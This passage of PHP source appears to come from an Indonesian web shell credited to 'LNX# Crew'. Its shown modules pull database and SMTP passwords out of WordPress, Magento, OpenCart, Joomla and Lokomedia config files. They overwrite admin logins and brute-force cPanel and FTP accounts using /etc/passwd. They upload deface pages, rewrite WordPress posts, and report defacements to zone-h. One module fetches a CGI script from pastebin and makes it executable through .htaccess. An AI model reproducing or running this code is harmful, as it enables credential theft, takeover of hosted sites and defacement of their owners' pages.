  793. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  794. }
  795. mysql_close($conn);
  796. } elseif(preg_match("/WordPress/",$config)) {
  797. $dbhost = ambilkata($config,"DB_HOST', '","'");
  798. $dbuser = ambilkata($config,"DB_USER', '","'");
  799. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  800. $dbname = ambilkata($config,"DB_NAME', '","'");
  801. $dbprefix = ambilkata($config,"table_prefix = '","'");
  802. $prefix = $dbprefix."users";
  803. $option = $dbprefix."options";
  804. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  805. $db = mysql_select_db($dbname);
  806. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  807. $result = mysql_fetch_array($q);
  808. $id = $result[ID];
  809. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  810. $result2 = mysql_fetch_array($q2);
  811. $target = $result2[option_value];
  812. if($target == '') {
  813. $url_target = "Login => <font color=red>error, gabisa ambil nama domain </font><br>";
  814. } else {
  815. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  816. }
  817. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  818. echo "Config => ".$file_conf."<br>";
  819. echo "CMS => Wordpress<br>";
  820. echo $url_target;
  821. if(!$update OR !$conn OR !$db) {
  822. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  823. } else {
  824. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  825. }
  826. mysql_close($conn);
  827. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  828. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  829. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  830. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  831. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  832. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  833. $prefix = $dbprefix."admin_user";
  834. $option = $dbprefix."core_config_data";
  835. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  836. $db = mysql_select_db($dbname);
  837. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  838. $result = mysql_fetch_array($q);
  839. $id = $result[user_id];
  840. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  841. $result2 = mysql_fetch_array($q2);
  842. $target = $result2[value];
  843. if($target == '') {
  844. $url_target = "Login => <font color=red>error, gabisa ambil nama domain </font><br>";
  845. } else {
  846. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  847. }
  848. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  849. echo "Config => ".$file_conf."<br>";
  850. echo "CMS => Magento<br>";
  851. echo $url_target;
  852. if(!$update OR !$conn OR !$db) {
  853. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  854. } else {
  855. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  856. }
  857. mysql_close($conn);
  858. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  859. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  860. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  861. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  862. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  863. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  864. $prefix = $dbprefix."user";
  865. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  866. $db = mysql_select_db($dbname);
  867. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  868. $result = mysql_fetch_array($q);
  869. $id = $result[user_id];
  870. $target = ambilkata($config,"HTTP_SERVER', '","'");
  871. if($target == '') {
  872. $url_target = "Login => <font color=red>error, gabisa ambil nama domain </font><br>";
  873. } else {
  874. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  875. }
  876. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  877. echo "Config => ".$file_conf."<br>";
  878. echo "CMS => OpenCart<br>";
  879. echo $url_target;
  880. if(!$update OR !$conn OR !$db) {
  881. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  882. } else {
  883. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  884. }
  885. mysql_close($conn);
  886. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  887. $dbhost = ambilkata($config,'server = "','"');
  888. $dbuser = ambilkata($config,'username = "','"');
  889. $dbpass = ambilkata($config,'password = "','"');
  890. $dbname = ambilkata($config,'database = "','"');
  891. $prefix = "users";
  892. $option = "identitas";
  893. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  894. $db = mysql_select_db($dbname);
  895. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  896. $result = mysql_fetch_array($q);
  897. $target = $result[alamat_website];
  898. if($target == '') {
  899. $target2 = $result[url];
  900. $url_target = "Login => <font color=red>error, gabisa ambil nama domain </font><br>";
  901. if($target2 == '') {
  902. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain </font><br>";
  903. } else {
  904. $cek_login3 = file_get_contents("$target2/adminweb/");
  905. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  906. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  907. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  908. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  909. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  910. } else {
  911. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  912. }
  913. }
  914. } else {
  915. $cek_login = file_get_contents("$target/adminweb/");
  916. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  917. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  918. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  919. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  920. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  921. } else {
  922. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  923. }
  924. }
  925. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  926. echo "Config => ".$file_conf."<br>";
  927. echo "CMS => Lokomedia<br>";
  928. if(preg_match('/error, gabisa ambil nama domain /', $url_target)) {
  929. echo $url_target2;
  930. } else {
  931. echo $url_target;
  932. }
  933. if(!$update OR !$conn OR !$db) {
  934. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  935. } else {
  936. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  937. }
  938. mysql_close($conn);
  939. }
  940. }
  941. }
  942. } else {
  943. echo "<center>
  944. <h1>Auto Edit User Config</h1>
  945. <form method='post'>
  946. DIR Config: <br>
  947. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  948. Set User & Pass: <br>
  949. <input type='text' name='user_baru' value='LNX' placeholder='user_baru'><br>
  950. <input type='text' name='pass_baru' value='LNX' placeholder='pass_baru'><br>
  951. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  952. </form>
  953. <span>NB: jalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  954. ";
  955. }
  956. } elseif($_GET['do'] == 'cpanel') {
  957. if($_POST['crack']) {
  958. $usercp = explode("\r\n", $_POST['user_cp']);
  959. $passcp = explode("\r\n", $_POST['pass_cp']);
  960. $i = 0;
  961. foreach($usercp as $ucp) {
  962. foreach($passcp as $pcp) {
  963. if(@mysql_connect('localhost', $ucp, $pcp)) {
  964. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  965. } else {
  966. $_SESSION[$ucp] = "1";
  967. $_SESSION[$pcp] = "1";
  968. if($ucp == '' || $pcp == '') {
  969.  
  970. } else {
  971. $i++;
  972. if(function_exists('posix_getpwuid')) {
  973. $domain_cp = file_get_contents("/etc/named.conf");
  974. if($domain_cp == '') {
  975. $dom = "<font color=red>gabisa ambil nama domain </font>";
  976. } else {
  977. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  978. foreach($domains_cp[1] as $dj) {
  979. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  980. $user_cp_url = $user_cp_url['name'];
  981. if($user_cp_url == $ucp) {
  982. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  983. break;
  984. }
  985. }
  986. }
  987. } else {
  988. $dom = "<font color=red>function is Disable by system</font>";
  989. }
  990. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  991. }
  992. }
  993. }
  994. }
  995. }
  996. if($i == 0) {
  997. } else {
  998. echo "<br>sukses ".$i." Cpanel by <font color=lime>LNX# Crew.</font>";
  999. }
  1000. } else {
  1001. echo "<center>
  1002. <form method='post'>
  1003. USER: <br>
  1004. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1005. $_usercp = fopen("/etc/passwd","r");
  1006. while($getu = fgets($_usercp)) {
  1007. if($getu == '' || !$_usercp) {
  1008. echo "<font color=red>Can't read /etc/passwd</font>";
  1009. } else {
  1010. preg_match_all("/(.*?):x:/", $getu, $u);
  1011. foreach($u[1] as $user_cp) {
  1012. if(is_dir("/home/$user_cp/public_html")) {
  1013. echo "$user_cp\n";
  1014. }
  1015. }
  1016. }
  1017. }
  1018. echo "</textarea><br>
  1019. PASS: <br>
  1020. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1021. function cp_pass($dir) {
  1022. $pass = "";
  1023. $dira = scandir($dir);
  1024. foreach($dira as $dirb) {
  1025. if(!is_file("$dir/$dirb")) continue;
  1026. $ambil = file_get_contents("$dir/$dirb");
  1027. if(preg_match("/WordPress/", $ambil)) {
  1028. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1029. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1030. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1031. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1032. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1033. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1034. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1035. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1036. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1037. } elseif(preg_match("/client/", $ambil)) {
  1038. preg_match("/password=(.*)/", $ambil, $pass1);
  1039. if(preg_match('/"/', $pass1[1])) {
  1040. $pass1[1] = str_replace('"', "", $pass1[1]);
  1041. $pass .= $pass1[1]."\n";
  1042. }
  1043. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1044. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1045. }
  1046. }
  1047. echo $pass;
  1048. }
  1049. $cp_pass = cp_pass($dir);
  1050. echo $cp_pass;
  1051. echo "</textarea><br>
  1052. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1053. </form>
  1054. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1055. }
  1056. } elseif($_GET['do'] == 'cpftp_auto') {
  1057. if($_POST['crack']) {
  1058. $usercp = explode("\r\n", $_POST['user_cp']);
  1059. $passcp = explode("\r\n", $_POST['pass_cp']);
  1060. $i = 0;
  1061. foreach($usercp as $ucp) {
  1062. foreach($passcp as $pcp) {
  1063. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1064. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1065. } else {
  1066. $_SESSION[$ucp] = "1";
  1067. $_SESSION[$pcp] = "1";
  1068. if($ucp == '' || $pcp == '') {
  1069. //
  1070. } else {
  1071. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1072. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  1073. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1074. if((!$ftp_login) || (!$ftp_conn)) {
  1075. echo "[+] <font color=red>Login Gagal</font><br><br>";
  1076. } else {
  1077. echo "[+] <font color=lime>Login Sukses</font><br>";
  1078. $fi = htmlspecialchars($_POST['file_deface']);
  1079. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1080. if($deface) {
  1081. $i++;
  1082. echo "[+] <font color=lime>Deface Sukses</font><br>";
  1083. if(function_exists('posix_getpwuid')) {
  1084. $domain_cp = file_get_contents("/etc/named.conf");
  1085. if($domain_cp == '') {
  1086. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1087. } else {
  1088. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1089. foreach($domains_cp[1] as $dj) {
  1090. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1091. $user_cp_url = $user_cp_url['name'];
  1092. if($user_cp_url == $ucp) {
  1093. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1094. break;
  1095. }
  1096. }
  1097. }
  1098. } else {
  1099. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1100. }
  1101. } else {
  1102. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1103. }
  1104. }
  1105. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1106. }
  1107. }
  1108. }
  1109. }
  1110. }
  1111. if($i == 0) {
  1112. } else {
  1113. echo "<br>sukses ".$i." Cpanel by <font color=lime>LNX# Crew.</font>";
  1114. }
  1115. } else {
  1116. echo "<center>
  1117. <form method='post'>
  1118. Filename: <br>
  1119. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1120. Deface Page: <br>
  1121. <input type='text' name='deface' placeholder='http://target.com/filemu.php' style='width: 450px;'><br>
  1122. USER: <br>
  1123. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1124. $_usercp = fopen("/etc/passwd","r");
  1125. while($getu = fgets($_usercp)) {
  1126. if($getu == '' || !$_usercp) {
  1127. echo "<font color=red>Can't read /etc/passwd</font>";
  1128. } else {
  1129. preg_match_all("/(.*?):x:/", $getu, $u);
  1130. foreach($u[1] as $user_cp) {
  1131. if(is_dir("/home/$user_cp/public_html")) {
  1132. echo "$user_cp\n";
  1133. }
  1134. }
  1135. }
  1136. }
  1137. echo "</textarea><br>
  1138. PASS: <br>
  1139. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1140. function cp_pass($dir) {
  1141. $pass = "";
  1142. $dira = scandir($dir);
  1143. foreach($dira as $dirb) {
  1144. if(!is_file("$dir/$dirb")) continue;
  1145. $ambil = file_get_contents("$dir/$dirb");
  1146. if(preg_match("/WordPress/", $ambil)) {
  1147. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1148. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1149. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1150. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1151. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1152. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1153. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1154. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1155. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1156. } elseif(preg_match("/client/", $ambil)) {
  1157. preg_match("/password=(.*)/", $ambil, $pass1);
  1158. if(preg_match('/"/', $pass1[1])) {
  1159. $pass1[1] = str_replace('"', "", $pass1[1]);
  1160. $pass .= $pass1[1]."\n";
  1161. }
  1162. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1163. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1164. }
  1165. }
  1166. echo $pass;
  1167. }
  1168. $cp_pass = cp_pass($dir);
  1169. echo $cp_pass;
  1170. echo "</textarea><br>
  1171. <input type='submit' name='crack' style='width: 450px;' value='submit'>
  1172. </form>
  1173. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1174. }
  1175. } elseif($_GET['do'] == 'smtp') {
  1176. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1177. function scj($dir) {
  1178. $dira = scandir($dir);
  1179. foreach($dira as $dirb) {
  1180. if(!is_file("$dir/$dirb")) continue;
  1181. $ambil = file_get_contents("$dir/$dirb");
  1182. $ambil = str_replace("$", "", $ambil);
  1183. if(preg_match("/JConfig|joomla/", $ambil)) {
  1184. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1185. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1186. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1187. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1188. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1189. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1190. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  1191. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  1192. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  1193. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  1194. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  1195. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  1196. }
  1197. }
  1198. }
  1199. $smpt_hunter = scj($dir);
  1200. echo $smpt_hunter;
  1201. } elseif($_GET['do'] == 'auto_wp') {
  1202. if($_POST['hajar']) {
  1203. $title = htmlspecialchars($_POST['new_title']);
  1204. $pn_title = str_replace(" ", "-", $title);
  1205. if($_POST['cek_edit'] == "Y") {
  1206. $script = $_POST['edit_content'];
  1207. } else {
  1208. $script = $title;
  1209. }
  1210. $conf = $_POST['config_dir'];
  1211. $scan_conf = scandir($conf);
  1212. foreach($scan_conf as $file_conf) {
  1213. if(!is_file("$conf/$file_conf")) continue;
  1214. $config = file_get_contents("$conf/$file_conf");
  1215. if(preg_match("/WordPress/", $config)) {
  1216. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1217. $dbuser = ambilkata($config,"DB_USER', '","'");
  1218. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1219. $dbname = ambilkata($config,"DB_NAME', '","'");
  1220. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1221. $prefix = $dbprefix."posts";
  1222. $option = $dbprefix."options";
  1223. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1224. $db = mysql_select_db($dbname);
  1225. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1226. $result = mysql_fetch_array($q);
  1227. $id = $result[ID];
  1228. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1229. $result2 = mysql_fetch_array($q2);
  1230. $target = $result2[option_value];
  1231. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1232. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1233. echo "<div style='margin: 5px auto;'>";
  1234. if($target == '') {
  1235. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1236. } else {
  1237. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1238. }
  1239. if(!$update OR !$conn OR !$db) {
  1240. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1241. } else {
  1242. echo "<font color=lime>sukses di ganti.</font><br>";
  1243. }
  1244. echo "</div>";
  1245. mysql_close($conn);
  1246. }
  1247. }
  1248. } else {
  1249. echo "<center>
  1250. <h1>Auto Edit Title+Content WordPress</h1>
  1251. <form method='post'>
  1252. DIR Config: <br>
  1253. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1254. Set Title: <br>
  1255. <input type='text' name='new_title' value='LNX# Crew' placeholder='New Title'><br><br>
  1256. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1257. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1258. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1259. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1260. </form>
  1261. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1262. ";
  1263. }
  1264. } elseif($_GET['do'] == 'zoneh') {
  1265. if($_POST['submit']) {
  1266. $domain = explode("\r\n", $_POST['url']);
  1267. $nick = $_POST['nick'];
  1268. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1269. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1270. function zoneh($url,$nick) {
  1271. $ch = curl_init("http://www.zone-h.com/notify/single");
  1272. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1273. curl_setopt($ch, CURLOPT_POST, true);
  1274. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1275. return curl_exec($ch);
  1276. curl_close($ch);
  1277. }
  1278. foreach($domain as $url) {
  1279. $zoneh = zoneh($url,$nick);
  1280. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1281. echo "$url -> <font color=lime>OK</font><br>";
  1282. } else {
  1283. echo "$url -> <font color=red>ERROR</font><br>";
  1284. }
  1285. }
  1286. } else {
  1287. echo "<center><form method='post'>
  1288. <u>Defacer</u>: <br>
  1289. <input type='text' name='nick' size='50' value='LNX# Crew'><br>
  1290. <u>Domains</u>: <br>
  1291. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1292. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1293. </form>";
  1294. }
  1295. echo "</center>";
  1296. } elseif($_GET['do'] == 'cgi') {
  1297. $cgi_dir = mkdir('idx_cgi', 0755);
  1298. $file_cgi = "idx_cgi/cgi.izo";
  1299. $isi_htcgi = "AddHandler cgi-script .izo";
  1300. $htcgi = fopen(".htaccess", "w");
  1301. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  1302. $cgi = fopen($file_cgi, "w");
  1303. fwrite($cgi, $cgi_script);
  1304. fwrite($htcgi, $isi_htcgi);
  1305. chmod($file_cgi, 0755);
  1306. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1307. } elseif($_GET['do'] == 'fake_root') {
  1308. ob_start();
  1309. function reverse($url) {
  1310. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  1311. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1312. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  1313. curl_setopt($ch, CURLOPT_HEADER, 0);
  1314. curl_setopt($ch, CURLOPT_POST, 1);
  1315. $resp = curl_exec($ch);
  1316. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  1317. $array = explode(",,", $resp);
  1318. unset($array[0]);
  1319. foreach($array as $lnk) {
  1320. $lnk = "http://$lnk";
  1321. $lnk = str_replace(",", "", $lnk);
  1322. echo $lnk."\n";
  1323. ob_flush();
  1324. flush();
  1325. }
  1326. curl_close($ch);
  1327. }
  1328. function cek($url) {
  1329. $ch = curl_init($url);
  1330. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1331. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  1332. $resp = curl_exec($ch);
  1333. return $resp;
  1334. }
  1335. $cwd = getcwd();
  1336. $ambil_user = explode("/", $cwd);
  1337. $user = $ambil_user[2];
  1338. if($_POST['reverse']) {
  1339. $site = explode("\r\n", $_POST['url']);
  1340. $file = $_POST['file'];
  1341. foreach($site as $url) {
  1342. $cek = cek("$url/~$user/$file");
  1343. if(preg_match("/hacked/i", $cek)) {
  1344. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1345. }
  1346. }
  1347. } else {
  1348. echo "<center><form method='post'>
  1349. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1350. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1351. Domain: <br>
  1352. <textarea style='width: 450px; height: 250px;' name='url'>";
  1353. reverse($_SERVER['HTTP_HOST']);
  1354. echo "</textarea><br>
  1355. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1356. </form><br>
  1357. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1358. }
  1359. } elseif($_GET['do'] == 'adminer') {
  1360. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1361. function adminer($url, $isi) {
  1362. $fp = fopen($isi, "w");
  1363. $ch = curl_init();
  1364. curl_setopt($ch, CURLOPT_URL, $url);
  1365. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1366. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1367. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1368. curl_setopt($ch, CURLOPT_FILE, $fp);
  1369. return curl_exec($ch);
  1370. curl_close($ch);
  1371. fclose($fp);
  1372. ob_flush();
  1373. flush();
  1374. }
  1375. if(file_exists('adminer.php')) {
  1376. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1377. } else {
  1378. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1379. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1380. } else {
  1381. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1382. }
  1383. }
  1384. } elseif($_GET['do'] == 'auto_dwp') {
  1385. if($_POST['auto_deface_wp']) {
  1386. function anucurl($sites) {
  1387. $ch = curl_init($sites);
  1388. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1389. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1390. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1391. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1392. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1393. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1394. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1395. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1396. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1397. $data = curl_exec($ch);
  1398. curl_close($ch);
  1399. return $data;
  1400. }
  1401. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1402. $post = array(
  1403. "log" => "$userr",
  1404. "pwd" => "$pass",
  1405. "rememberme" => "forever",
  1406. "wp-submit" => "$wp_submit",
  1407. "redirect_to" => "$web",
  1408. "testcookie" => "1",
  1409. );
  1410. $ch = curl_init($cek);
  1411. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1412. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1413. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1414. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1415. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1416. curl_setopt($ch, CURLOPT_POST, 1);
  1417. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1418. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1419. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
